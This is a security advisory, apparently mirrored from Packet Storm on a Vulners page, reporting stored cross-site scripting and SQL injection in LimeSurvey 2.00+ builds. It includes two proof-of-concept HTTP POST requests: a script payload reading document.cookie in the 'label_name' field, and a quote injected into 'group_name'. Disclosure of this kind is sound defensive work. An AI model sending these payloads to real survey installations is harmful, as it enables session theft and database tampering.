Lucene search
K

LimeSurvey 2.00+ Build 131107 Cross Site Scripting / SQL Injection

🗓️ 25 Nov 2013 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

LimeSurvey 2.00+ Build 131107 Cross Site Scripting / SQL Injection Vulnerabilit

Code
`  
LimeSurvey v2.00+ (build 131107) Script Insertion And SQL Injection Vulnerability  
  
  
Vendor: LimeSurvey Project Team  
Product web page: http://www.limesurvey.org  
  
Affected version: 2.00+ build 131009  
2.00+ build 131022  
2.00+ build 131031  
2.00+ build 131107  
  
Summary: LimeSurvey (formerly PHPSurveyor) is a free and open source  
on-line survey application written in PHP based on a MySQL, PostgreSQL  
or MSSQL database, distributed under the GNU General Public License. As  
a web server-based software it enables users to develop and publish on-line  
surveys, and collect responses, without doing any programming.  
  
Desc: LimeSurvey suffers from a stored cross-site scripting and SQL Injection  
vulnerability. Input passed to the 'label_name' POST parameter is not properly  
sanitised before being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context of an  
affected site. Input passed to the 'group_name' POST parameter is not properly  
sanitised before being used in SQL queries. This can be exploited to manipulate  
SQL queries by injecting arbitrary SQL code.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.7  
MySQL 5.5.25a  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2013-5161  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5161.php  
  
Vendor: http://www.limesurvey.org/en/stable-release  
  
  
  
19.11.2013  
  
--  
  
  
XSS:  
----------------------------------------------------------------------------------  
  
POST /limesurvey/index.php/admin/labels/sa/process HTTP/1.1  
Host: localhost  
Accept: */*  
Accept-Language: en  
User-Agent: joxypoxy/1.0  
Connection: close  
Referer: http://localhost/limesurvey/index.php/admin/labels/sa/newlabelset  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 151  
Cookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1  
  
label_name=Zero+Science+Lab"<script>alert(document.cookie)</script>&additional_languages=he&action=insertlabelset&languageids=he&available_languages=am  
  
----------------------------------------------------------------------------------  
  
  
  
  
SQLi:  
----------------------------------------------------------------------------------  
  
POST /limesurvey/index.php/admin/usergroups/sa/add HTTP/1.1  
Host: localhost  
Accept: */*  
Accept-Language: en  
User-Agent: joxypoxy/1.0  
Connection: close  
Referer: http://localhost/limesurvey/index.php/admin/usergroups/sa/add  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 49  
Cookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1  
  
group_name=Zero+Science+Lab'&action=usergroupindb  
  
----------------------------------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation